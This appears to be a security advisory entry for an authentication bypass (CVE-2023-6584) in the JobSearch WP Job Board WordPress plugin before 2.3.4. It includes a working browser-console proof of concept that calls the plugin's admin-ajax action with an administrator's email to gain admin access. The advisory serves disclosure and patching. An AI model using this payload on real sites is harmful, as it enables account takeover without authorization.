Lucene search
Marc MontpasWPEX-ID:E528E3CD-A45C-4BF7-A37A-101F5C257ACDHistoryFeb 02, 2024 - 12:00 a.m.
JobSearch WP Job Board < 2.3.4 - Authentication Bypass
2024-02-0200:00:00
Marc Montpas
148
jobsearch
wp job board
authentication bypass
browser
console
exploit
admin access
security vulnerability
Description The plugin does not prevent attackers from logging-in as any users with the only knowledge of that user’s email address.
Browse to the site, paste the following in your browser's console (replace the email address with that site's administrator's email address):
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: new URLSearchParams({
'action': 'jobsearch_facebook_get_soc_login_url',
'user_data': JSON.stringify({
"id": Math.random()*1000,
"email": "[email protected]",
})
})
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));
Then access /wp-admin, and notice you're logged-in as an admin.Related
wpvulndb
wpvulndb
JobSearch WP Job Board < 2.3.4 - Authentication Bypass
2024-02-02 00:00:00
cve
cve
CVE-2023-6584
2024-02-27 09:15:37
prion
prion
Code injection
2024-02-27 09:15:00
nvd
nvd
CVE-2023-6584
2024-02-27 09:15:37
vulnrichment
vulnrichment
CVE-2023-6584 JobSearch WP Job Board < 2.3.4 - Authentication Bypass
2024-02-27 08:30:26
cvelist
cvelist
CVE-2023-6584 JobSearch WP Job Board < 2.3.4 - Authentication Bypass
2024-02-27 08:30:26
AI Score
6.8
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:E528E3CD-A45C-4BF7-A37A-101F5C257ACD